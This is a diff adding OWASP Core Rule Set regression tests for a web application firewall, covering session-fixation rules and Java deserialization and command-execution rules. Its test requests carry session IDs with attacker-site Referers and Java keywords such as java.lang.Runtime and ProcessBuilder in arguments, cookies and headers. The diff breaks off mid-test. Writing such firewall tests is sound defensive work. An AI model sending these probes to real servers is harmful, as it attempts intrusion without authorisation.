a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml new file mode 100644 index 00000000..b1c2f603 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -0,0 +1,85 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 943110.yaml +tests: + - test_title: 943110-1 + desc: Session Fixation Attack (943110) from old modsec regressions + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + log_contains: id "943110" + - test_title: 943110-2 + desc: "session fixation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_title: 943110-3 + desc: "session fixation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_title: 943110-4 + desc: Session Fixation Attack (943110) from old modsec regressions + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + no_log_contains: id "943110" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml new file mode 100644 index 00000000..71cf166d --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 943120.yaml +tests: + - test_title: 943120-1 + desc: Session Fixation Attack (943120) from old modsec regressions + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + log_contains: id "943120" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml new file mode 100644 index 00000000..64075646 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -0,0 +1,26 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944000.yaml" + description: "Description" +tests: + - test_title: 944000-1 + desc: Using text/plain Content-Type which do not have any bodyprocessor associated + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=value" + output: + no_log_contains: "id \"944000\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml new file mode 100644 index 00000000..8e008971 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml @@ -0,0 +1,355 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944100.yaml" + description: "Description" +tests: + - test_title: 944100-1 + desc: Argument test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-2 + desc: Argument test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" + - test_title: 944100-3 + desc: Argument name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944100\"" + - test_title: 944100-4 + desc: Argument name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944100\"" + - test_title: 944100-5 + desc: Cookie test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-6 + desc: Cookie test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-7 + desc: Cookie name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-8 + desc: Cookie name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-9 + desc: Request header test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-10 + desc: Request header test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-11 + desc: XML element includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-12 + desc: XML attribute name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-13 + desc: XML attribute value includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-14 + desc: XML element value includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-15 + desc: XML element includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-16 + desc: XML attribute name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-17 + desc: XML attribute value includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-18 + desc: XML element value includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml new file mode 100644 index 00000000..c7cc1360 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml @@ -0,0 +1,355 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944110.yaml" + description: "Description" +tests: + - test_title: 944110-1 + desc: Argument test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log_contains: "id \"944110\"" + - test_title: 944110-2 + desc: Argument test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log_contains: "id \"944110\"" + - test_title: 944110-3 + desc: Argument name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log_contains: "id \"944110\"" + - test_title: 944110-4 + desc: Argument name includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log_contains: "id \"944110\"" + - test_title: 944110-5 + desc: Cookie test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-6 + desc: Cookie test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-7 + desc: Cookie name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-8 + desc: Cookie name includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-9 + desc: Request header test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-10 + desc: Request header test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-11 + desc: XML element includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-12 + desc: XML attribute name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-13 + desc: XML attribute value includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-14 + desc: XML element value includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.Runtime" + output: + log_contains: "id \"944110\"" + - test_title: 944110-15 + desc: XML element includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-16 + desc: XML attribute name includes keyworda java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-17 + desc: XML attribute value includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-18 + desc: XML element value includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log_contains: "id \"944110\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml new file mode 100644 index 00000000..831da6f1 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml @@ -0,0 +1,2809 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944120.yaml" + description: "Positive tests for rule 944120" +tests: + - test_title: 944120-1 + desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-2 + desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-3 + desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-4 + desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-5 + desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-6 + desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-7 + desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-8 + desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: 